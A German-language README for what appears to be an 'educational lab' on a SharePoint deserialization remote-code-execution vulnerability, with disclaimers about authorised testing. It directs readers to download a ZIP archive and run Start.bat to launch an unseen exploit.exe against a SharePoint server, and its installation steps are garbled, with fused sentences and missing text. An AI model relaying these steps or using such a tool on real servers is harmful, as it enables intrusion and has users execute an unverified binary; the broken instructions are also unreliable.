
Bildungslabor, das eine Deserialisierungsschwachstelle in Microsoft SharePoint demonstriert, die Remote-Codeausführung ermöglicht, mit einer praxisnahen Exploit-Oberfläche für autorisierte Tests.
Dieses Lab demonstriert eine Deserialisierungsschwachstelle in Microsoft Office SharePoint, die Remote-Codeausführung (RCE) ermöglicht. Das Problem entsteht durch unsachgemäße Verarbeitung nicht vertrauenswürdiger serialisierter Daten in den Objekt-Deserialisierungsroutinen von SharePoint, wodurch ein authentifizierter Angreifer beliebigen Code auf dem Zielserver ausführen kann. Mit einem CVSSv3-Score von 8.8 betrifft diese Schwachstelle mit hohem Schweregrad verschiedene SharePoint-Versionen, einschließlich Enterprise Server 2016, Server 2019 und Subscription Edition. Eine erfolgreiche Ausnutzung könnte zu Datendiebstahl, Privilegieneskalation oder vollständiger Systemkompromittierung in vernetzten Umgebungen führen.
Dieses Lab beinhaltet Simulationen potenziell schädlicher Codeausführung. Verwenden Sie es nur in isolierten, nicht produktiven Umgebungen. Stellen Sie es nicht ohne entsprechende Autorisierung auf Live-Systemen oder Netzwerken bereit. Die Autoren lehnen jegliche Haftung für Missbrauch, Schäden oder rechtliche Konsequenzen ab, die aus diesem Repository entstehen. Halten Sie sich stets an ethische Hacking-Richtlinien und holen Sie ausdrückliche Genehmigung ein, bevor Sie Systeme testen.
Nur zu Bildungszwecken: Dieses Repository dient ausschließlich dem Lernen über Softwareschwachstellen und sichere Codierungspraktiken. Es ist nicht dazu gedacht, unbefugten Zugriff, Angriffe oder illegale Aktivitäten zu ermöglichen.
Laden Sie die Lab-Ressourcen als ZIP-Archiv über den folgenden Link herunter: Lab-ZIP herunterladen.
Zur Installation:
C:\cve-2025-54897-lab).dotnet --version in der Eingabeaufforderung ausführen.Start.bat aus, um exploit.exe zu starten. Dadurch wird die Ausnutzungsschnittstelle in einem Konsolenfenster geöffnet.http://localhost:80 für lokale Tests).Bei Fragen oder Beiträgen kontaktieren Sie mich per E-Mail unter [email protected]